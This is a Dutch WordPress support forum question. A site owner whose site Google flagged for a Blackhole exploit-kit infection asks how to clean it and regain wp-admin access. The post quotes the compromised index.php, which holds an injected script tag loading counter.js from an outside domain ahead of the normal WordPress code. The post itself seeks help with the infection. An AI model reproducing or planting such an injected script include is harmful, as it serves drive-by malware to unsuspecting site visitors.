Support » Algemene WordPress vragen » Warning: Cannot modify header information

  • kan iemand zeggen hoe ik weer bij mijn wp-admin kan komen en deze verwijderen?
    Mijn site is geinfecteerd volgens google met malware door een exploit blackhole kit. Geen idee wat het is maar klinkt fout. Waarschuwing is :
    Warning: Cannot modify header information – headers already sent by (output started at /home/dfwp/domains/hezzies.nl/public_html/index.php:1)
    Google meldt
    ik zie aan recent update bestanden index.php ide ik niet heb geupdate als ik die open een onbetrouwbare verwijzing staan :
    <script type=”text/javascript” src=”http://ddc.nieruchomosci.pl/counter.js”></script>&lt;?php
    /**
    * Front to the WordPress application. This file doesn’t do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define(‘WP_USE_THEMES’, true);

    /** Loads the WordPress Environment and Template */
    require(‘./wp-blog-header.php’);
    ?>
    wat ik heb gedaan:
    bestand counter.js tijdelijk verwijderd van de public.html
    Vraag moet deze blijven staan?

1 reactie aan het bekijken (van in totaal 1)
1 reactie aan het bekijken (van in totaal 1)
  • Het onderwerp ‘Warning: Cannot modify header information’ is gesloten voor nieuwe reacties.